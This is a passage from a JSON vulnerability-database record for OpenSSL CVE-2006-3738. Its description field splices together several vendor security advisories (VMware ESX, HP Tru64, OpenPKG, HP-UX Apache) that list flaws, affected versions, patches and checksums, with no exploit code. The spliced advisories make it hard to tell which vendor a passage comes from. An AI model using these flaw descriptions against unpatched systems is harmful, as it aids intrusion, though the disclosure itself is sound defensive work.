0.9.8d,\n    and earlier versions allows attackers to cause a denial of service\n    (CPU consumption) via parasitic public keys with large (1) \"public\n    exponent\" or (2) \"public modulus\" values in X.509 certificates that\n    require extra time to process when using RSA signature verification. \n\n    (CVE-2006-4339) OpenSSL before 0.9.7, 0.9.7 before 0.9.7k, and 0.9.8\n    before 0.9.8c, when using an RSA key with exponent 3, removes PKCS-1\n    padding before generating a hash, which allows remote attackers to\n    forge a PKCS #1 v1.5 signature that is signed by that RSA key and\n    prevents OpenSSL from correctly verifying X.509 and other\n    certificates that use PKCS #1. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    assigned the names CVE-2006-2937, CVE-2006-2940, CVE-2006-3738,\n    CVE-2006-4339, and CVE-2006-4343 to these issues. \n\nc. Updated OpenSSH package addresses the following possible security issues:\n\n    ESX 3.0.1: corrected by Patch ESX-9986131\n    ESX 3.0.0: corrected by Patch ESX-3069097\n    ESX 2.5.4: does not have these problems\n    ESX 2.5.3: does not have these problems\n    ESX 2.1.3: does not have these problems\n    ESX 2.0.2: does not have these problems\n\n    (CVE-2004-2069) sshd.c in OpenSSH 3.6.1p2 and 3.7.1p2 and possibly\n    other versions, when using privilege separation, does not properly\n    signal the non-privileged process when a session has been terminated\n    after exceeding the LoginGraceTime setting, which leaves the\n    connection open and allows remote attackers to cause a denial of\n    service (connection consumption). \n\n    (CVE-2006-0225) scp in OpenSSH 4.2p1 allows attackers to execute\n    arbitrary commands via filenames that contain shell metacharacters\n    or spaces, which are expanded twice. \n\n    (CVE-2003-0386) OpenSSH 3.6.1 and earlier, when restricting host\n    access by numeric IP addresses and with VerifyReverseMapping\n    disabled, allows remote attackers to bypass \"from=\" and \"user@host\"\n    address restrictions by connecting to a host from a system whose\n    reverse DNS hostname contains the numeric IP address. \n\n    (CVE-2006-4924) sshd in OpenSSH before 4.4, when using the version 1\n    SSH protocol, allows remote attackers to cause a denial of service\n    (CPU consumption) via an SSH packet that contains duplicate blocks,\n    which is not properly handled by the CRC compensation attack\n    detector. \n\n    NOTE: ESX by default disables version 1 SSH protocol. \n\n    (CVE-2006-5051) Signal handler race condition in OpenSSH before 4.4\n    allows remote attackers to cause a denial of service (crash), and\n    possibly execute arbitrary code if GSSAPI authentication is enabled,\n    via unspecified vectors that lead to a double-free. \n\n    NOTE: ESX doesn\u0027t use GSSAPI by default. \n\n    (CVE-2006-5794) Unspecified vulnerability in the sshd Privilege\n    Separation Monitor in OpenSSH before 4.5 causes weaker verification\n    that authentication has been successful, which might allow attackers\n    to bypass authentication. \n\n    NOTE: as of 20061108, it is believed that this issue is only\n    exploitable by leveraging vulnerabilities in the unprivileged\n    process, which are not known to exist. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    assigned the names CVE-2004-2069, CVE-2006-0225, CVE-2003-0386,\n    CVE-2006-4924, CVE-2006-5051, and CVE-2006-5794 to these issues. \n\nd. Object reuse problems with newly created virtual disk (.vmdk or .dsk)\nfiles:\n\n    ESX 3.0.1: does not have this problem\n    ESX 3.0.0: does not have this problem\n    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)\n    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)\n    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)\n    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)\n\n    A possible security issue with virtual disk (.vmdk or .dsk) files\n    that are newly created, but contain blocks from recently deleted\n    virtual disk files.  Information belonging to the previously\n    deleted virtual disk files could be revealed in newly created\n    virtual disk files. \n\n    VMware recommends the following workaround: When creating new\n    virtual machines on an ESX Server that may contain sensitive\n    data, use vmkfstools with the -W option. This initializes the\n    virtual disk with zeros.  NOTE: ESX 3.x defines this option as -w. \n\ne. Buffer overflow in Python function repr():\n\n    ESX 3.0.1: corrected by Patch ESX-9986131\n    ESX 3.0.0: corrected by ESX-3069097\n    ESX 2.5.4: does not have this problem\n    ESX 2.5.3: does not have this problem\n    ESX 2.1.3: does not have this problem\n    ESX 2.0.2: does not have this problem\n\n    A possible security issue with how the Python function repr()\n    function handles UTF-32/UCS-4 strings. \n\n    The Common Vulnerabilities and Exposures project (cve.mitre.org)\n    assigned the name CVE-2006-4980 to this issue. \n\n4. Solution:\n\nPlease review the Patch notes for your version of ESX and verify the md5sum. \n\n  ESX 3.0.1\n  http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html\n  md5usm: 239375e107fd4c7af57663f023863fcb\n\n  ESX 3.0.0\n  http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html\n  md5sum: ca9947239fffda708f2c94f519df33dc\n\n  ESX 2.5.4\n  http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html\n  md5sum: 239375e107fd4c7af57663f023863fcb\n\n  ESX 2.5.3\n  http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html\n  md5sum: f90fcab28362edbf2311f3ca90cc7739\n\n  ESX 2.1.3\n  http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html\n  md5sum: 7d7d0e40f4dccd5ca64b9c13a856da8f\n\n  ESX 2.0.2\n  http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html\n  md5sum: 925e70f28d17714c53fdbd24de64329f\n\n\n5. References:\n\nESX 3.0.0 Patch URL:\nhttp://www.vmware.com/support/vi3/doc/esx-3069097-patch.html\nKnowledge base URL:  http://kb.vmware.com/kb/3069097\n\nESX 3.0.1 Patch URL:\nhttp://www.vmware.com/support/vi3/doc/esx-9986131-patch.html\nKnowledge base URL:  http://kb.vmware.com/kb/9986131\n\nESX 2.5.4 Patch URL:\nhttp://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html\n\nESX 2.5.3 Patch URL:\nhttp://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html\n\nESX 2.1.3 Patch URL:\nhttp://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html\n\nESX 2.0.2 Patch URL:\nhttp://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html\n\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3589\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4980\n\n6. Contact:\n\nhttp://www.vmware.com/security\n\nVMware Security Response Policy\nhttp://www.vmware.com/vmtn/technology/security/security_response.html\n\nE-mail:  security@vmware.com\n\nCopyright 2007 VMware Inc. All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (GNU/Linux)\n\niD8DBQFFovs16KjQhy2pPmkRCMfyAKCXhdGwZyXW5VzSwcOmu2NNXKN/OwCgo+CE\nneFG0RikD74TCYeXKW6CBy4=\n=9/6k\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. \nThe following supported software versions are affected: \nHP Tru64 UNIX v 5.1B-4 (SSL and BIND) \nHP Tru64 UNIX v 5.1B-3 (SSL and BIND) \nHP Tru64 UNIX v 5.1A PK6 (BIND) \nHP Tru64 UNIX v 4.0G PK4 (BIND) \nHP Tru64 UNIX v 4.0F PK8 (BIND) \nInternet Express (IX) v 6.6 BIND (BIND) \nHP Insight Management Agents for Tru64 UNIX patch v 3.5.2 and earlier (SSL) \n\nBACKGROUND\n\nRESOLUTION\n\nHP has released the following Early Release Patch kits (ERPs) publicly for use by any customer. The ERP kits use dupatch to install and will not install over any Customer Specific Patches (CSPs) that have file intersections with the ERP. A new patch version for HP Insight Management Agents for Tru64 UNIX is also available that addresses the potential vulnerabilities. \n\nThe fixes contained in the ERP kits will be available in the following mainstream releases:\n -Targeted for availability in HP Tru64 UNIX v 5.1B-5 \n -Internet Express (IX) v 6.7 \n -HP Insight Management Agents for Tru64 UNIX patch v 3.6.1 (already available) \n\nHP Tru64 UNIX Version 5.1B-4 ERP Kit \nLocation: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT1001167-V51BB27-ES-20070321 \nName: T64KIT1001167-V51BB27-ES-20070321\nMD5 Checksum: a697a90bd0b1116b6f27d1100bbf81fd\n \nHP Tru64 UNIX Version 5.1B-3 ERP Kit \nLocation: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT1001163-V51BB26-ES-20070315 \nName: T64KIT1001163-V51BB26-ES-20070315\nMD5 Checksum: d376d403176f0dbe7badd4df4e91c126\n \nHP Tru64 UNIX Version 5.1A PK6 ERP Kit \nLocation: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT1001160-V51AB24-ES-20070314 \nName: T64KIT1001160-V51AB24-ES-20070314\nMD5 Checksum: 7bb43ef667993f7c4711b6cf978e0aa7\n \nHP Tru64 UNIX Version 4.0G PK4 ERP Kit \nLocation: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=T64KIT1001166-V40GB22-ES-20070316 \nName: T64KIT1001166-V40GB22-ES-20070316\nMD5 Checksum: a446c39169b769c4a03c654844d5ac45\n \nHP Tru64 UNIX Version 4.0F PK8 ERP Kit \nLocation: http://www.itrc.hp.com/service/patch/patchDetail.do?patchid=DUXKIT1001165-V40FB22-ES-20070316 \nName: DUXKIT1001165-V40FB22-ES-20070316\nMD5 Checksum: 718148c87a913536b32a47af4c36b04e\n \nHP Insight Management Agents for Tru64 UNIX patch version 3.6.1 (for kit CPQIIM360) \nLocation: http://h30097.www3.hp.com/cma/patches.html \nName: CPQIM360.SSL.01.tar.gz\nMD5 Checksum: 1001a10ab642461c87540826dfe28652\n \nInternet Express (IX) v 6.6 BIND \nNote: Customers who use Internet Express (IX) v 6.6 BIND should install the BIND 9.2.8 patch from the ERP kit appropriate for their base operating system version. \n \n\n\nPRODUCT SPECIFIC INFORMATION \n\nThe HP Tru64 UNIX v 5.1B-3 and v 5.1B-4 ERP kits distribute two patches:\n -OpenSSL 0.9.8d \n -BIND 9.2.8 built with OpenSSL 0.9.8d \n\nNote: HP Tru64 UNIX v 5.1A, v 4.0G, and v 4.0F releases did not distribute OpenSSL and so their ERP kits provide only the BIND 9.2.8 patch that has been built with OpenSSL 0.9.8d\n\nCustomers who have been using OpenSSL on HP Tru64 UNIX v 5.1B-3 and v 5.1B-4 should install the OpenSSL patch from the ERP kit appropriate for their base operating system version. \n\nThe HP Insight Management Agents for Tru64 UNIX patch contains OpenSSL 0.9.8d and is applicable for HP Tru64 UNIX v 5.1A, v 5.1B-3, and v 5.1B-4. ASN.1 Denial of Service Attack (1/2)\n\n     During the parsing of certain invalid ASN.1 structures an error\n     condition is mishandled. This can result in an infinite loop which\n     consumes system memory. ASN.1 Denial of Service Attack (2/2)\n\n     Certain types of public key can take disproportionate amounts of\n     time to process. This could be used by an attacker in a denial of\n     service attack. SSL_get_shared_ciphers() Buffer Overflow\n\n     A buffer overflow was discovered in the SSL_get_shared_ciphers()\n     utility function. SSLv2 Client Crash\n \n     A flaw in the SSLv2 client code was discovered. \n________________________________________________________________________\n\nReferences:\n  [0] http://www.openssl.org/news/secadv_20060928.txt \n  [1] http://www.openssl.org/\n  [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n  [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n  [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n  [5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n________________________________________________________________________\n\nFor security reasons, this advisory was digitally signed with the\nOpenPGP public key \"OpenPKG \u003copenpkg@openpkg.org\u003e\" (ID 63C4CB9F) of the\nOpenPKG project which you can retrieve from http://pgp.openpkg.org and\nhkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org\nfor details on how to verify the integrity of this advisory. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c00849540\nVersion: 1\n\nHPSBUX02186 SSRT071299 rev.1 - HP-UX running Apache Remote Execution of Arbitrary Code, Denial of Service (DoS), Unauthorized Access\n\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible. \n\nRelease Date: 2007-01-17\nLast Updated: 2007-01-23\n\nPotential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS), and unauthorized access. \n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with Apache running on HP-UX. \n\nReferences: CVE-2006-2940, CVE-2006-2937, CVE-2006-3738, CVE-2006-4343, CVE-2006-4339, CVE-2005-2969. \n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.11, B.11.23, and B.11.31 running Apache-based Web Server prior to v.2.0.58.01\n\nBACKGROUND\n\nAFFECTED VERSIONS\n\nFor IPv4:\nHP-UX B.11.00\nHP-UX B.11.11\n===========\nhpuxwsAPACHE\naction: install revision A.2.0.58.01 or subsequent\nrestart Apache\nURL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nFor IPv6:\nHP-UX B.11.11\n===========\nhpuxwsAPACHE,revision=B.1.0.00.01\nhpuxwsAPACHE,revision=B.1.0.07.01\nhpuxwsAPACHE,revision=B.1.0.08.01\nhpuxwsAPACHE,revision=B.1.0.09.01\nhpuxwsAPACHE,revision=B.1.0.10.01\nhpuxwsAPACHE,revision=B.2.0.48.00\nhpuxwsAPACHE,revision=B.2.0.49.00\nhpuxwsAPACHE,revision=B.2.0.50.00\nhpuxwsAPACHE,revision=B.2.0.51.00\nhpuxwsAPACHE,revision=B.2.0.52.00\nhpuxwsAPACHE,revision=B.2.0.53.00\nhpuxwsAPACHE,revision=B.2.0.54.00\nhpuxwsAPACHE,revision=B.2.0.55.00\nhpuxwsAPACHE,revision=B.2.0.56.00\nhpuxwsAPACHE,revision=B.2.0.58.00\naction: install revision B.2.0.58.01 or subsequent\nrestart Apache\nURL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nHP-UX B.11.23\n===========\nhpuxwsAPACHE\naction: install revision B.2.0.58.01 or subsequent\nrestart Apache\nURL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nEND AFFECTED VERSIONS\n\nRESOLUTION\n\nHP has made the following software updates available to resolve the issue. \nSoftware updates for the Apache-based Web Server are available from:\nhttp://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nHP-UX B.11.00, B.11.11 and HP-UX B.11.23 require the Apache-based Web Server v.2.0.58.01 or subsequent. \n\nApache Update Procedure\n\nCheck for Apache Installation\n -----------------------------\nTo determine if the Apache web server from HP is installed on your system, use Software Distributor\u0027s swlist command. All three revisions of the product may co-exist on a single system. \nFor example, the results of the command swlist -l product | grep -I apache\nhpuxwsAPACHE B.2.0.55.00 HP-UX Apache-based Web Server\n\nStop Apache\n -------------\nBefore updating, make sure the previous Apache binary is stopped. If Apache is not stopped, the installation would be successful but the new version would be prevented from starting until a later time. \nAfter determining which Apache is installed, stop Apache with the following commands:\nfor hpuxwsAPACHE: /opt/hpws/apache[32]/bin/apachectl stop\n\nDownload and Install Apache\n --------------------------\nDownload Apache from Software Depot. http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\nVerify successful download by comparing the cksum with the value specified on the installation web page. \nUse SD to swinstall the depot. Installation of this new revision of HP Apache over an existing HP Apache installation is supported, while installation over a non-HP Apache is NOT supported. \n\nRemoving Apache Installation\n ---------------------------\nThe potential vulnerability can also be resolved by removing Apache rather than installing a newer revision. To remove Apache use both Software Distributor\u0027s \"swremove\" command and also \"rm -rf\" the home location as specified in the rc.config.d file \"HOME\" variables. \n%ls /etc/rc.config.d | \\ grep apache hpapache2conf hpws_apache[32]conf\n\nMANUAL ACTIONS: Yes - Update plus other actions\nInstall the revision of the product. \n\nPRODUCT SPECIFIC INFORMATION\nHP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. \nFor more information: http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA\n\nHISTORY: rev.1 - 23 January 2007 Initial Release\n\nThird Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For further information, contact normal HP Services support channel. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. \nTo get the security-alert PGP key, please send an e-mail message as follows:\n  To: security-alert@hp.com\n  Subject: get key\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA\u0026langcode=USENG\u0026jumpid=in_SC-GEN__driverITRC\u0026topiccode=ITRC\nOn the web page: ITRC security bulletins and patch sign-up\nUnder Step1: your ITRC security bulletins and patches\n  - check ALL categories for which alerts are required and continue. \nUnder Step2: your ITRC operating systems\n  - verify your operating system selections are checked and save. \n\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\nLog in on the web page: Subscriber\u0027s choice for Business: sign-in. \nOn the web page: Subscriber\u0027s Choice: your profile summary - use Edit Profile to update appropriate sections. \n\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\n\n* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:\n\nGN = HP General SW\nMA = HP Management Agents\nMI = Misc. 3rd Party SW\nMP = HP MPE/iX\nNS = HP NonStop Servers\nOV = HP OpenVMS\nPI = HP Printing \u0026 Imaging\nST = HP Storage SW\nTL = HP Trusted Linux\nTU = HP Tru64 UNIX\nUX = HP-UX\nVV = HP VirtualVault\n\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. \n\n\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user\u0027s use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\"\n\n\\xa9Copyright 2007 Hewlett-Packard Development Company, L.P. \n\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. \nHP System Management Homepage (SMH) versions prior to 2.1.7 running on Linux and Windows. \n\nBACKGROUND\n\n\nRESOLUTION\nHP has provided System Management Homepage (SMH) version 2.1.7 or subsequent for each platform to resolve this issue",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          },
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "PACKETSTORM",
            "id": "59899"
          },
          {
            "db": "PACKETSTORM",
            "id": "50595"
          },
          {
            "db": "PACKETSTORM",
            "id": "50543"
          },
          {
            "db": "PACKETSTORM",
            "id": "53566"
          },
          {
            "db": "PACKETSTORM",
            "id": "56053"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "PACKETSTORM",
            "id": "58346"
          },
          {
            "db": "PACKETSTORM",
            "id": "50548"
          }
        ],
        "trust": 4.95
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2006-3738",
            "trust": 3.7
          },
          {
            "db": "BID",
            "id": "22083",
            "trust": 3.4
          },
          {
            "db": "BID",
            "id": "20249",
            "trust": 2.9
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300",
            "trust": 2.9
          },
          {
            "db": "SECUNIA",
            "id": "23280",
            "trust": 2.6
          },
          {
            "db": "SECUNIA",
            "id": "23309",
            "trust": 2.6
          },
          {
            "db": "SECUNIA",
            "id": "22130",
            "trust": 2.6
          },
          {
            "db": "SECUNIA",
            "id": "22207",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22212",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22116",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22216",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22220",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22330",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22240",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22259",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22260",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22165",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22166",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22172",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22284",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22186",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22193",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22094",
            "trust": 1.8
          },
          {
            "db": "SECTRACK",
            "id": "1016943",
            "trust": 1.8
          },
          {
            "db": "USCERT",
            "id": "TA06-333A",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "30161",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "26329",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "24930",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "30124",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22500",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22799",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22298",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "31492",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23038",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22460",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23915",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22385",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23155",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22487",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22654",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23680",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22626",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23794",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22633",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22772",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "24950",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "25889",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22544",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23340",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22791",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22758",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-1401",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-0343",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3902",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3869",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3860",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4401",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4314",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-2315",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4264",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4036",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4417",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4750",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3820",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-2783",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3936",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4443",
            "trust": 1.0
          },
          {
            "db": "SECTRACK",
            "id": "1017522",
            "trust": 1.0
          },
          {
            "db": "OSVDB",
            "id": "29262",
            "trust": 1.0
          },
          {
            "db": "BID",
            "id": "20246",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#386964",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "21709",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620",
            "trust": 0.8
          },
          {
            "db": "XF",
            "id": "29237",
            "trust": 0.8
          },
          {
            "db": "USCERT",
            "id": "SA06-333A",
            "trust": 0.8
          },
          {
            "db": "USCERT",
            "id": "TA07-017A",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594",
            "trust": 0.8
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2022.0696",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536",
            "trust": 0.6
          },
          {
            "db": "PACKETSTORM",
            "id": "59899",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50595",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50543",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "53566",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "56053",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50535",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50560",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "53990",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "58346",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50548",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "PACKETSTORM",
            "id": "59899"
          },
          {
            "db": "PACKETSTORM",
            "id": "50595"
          },
          {
            "db": "PACKETSTORM",
            "id": "50543"
          },
          {
            "db": "PACKETSTORM",
            "id": "53566"
          },
          {
            "db": "PACKETSTORM",
            "id": "56053"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "PACKETSTORM",
            "id": "58346"
          },
          {
            "db": "PACKETSTORM",
            "id": "50548"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "id": "VAR-200609-1416",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.28107159000000004
      },
      "last_update_date": "2025-11-24T22:25:19.396000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
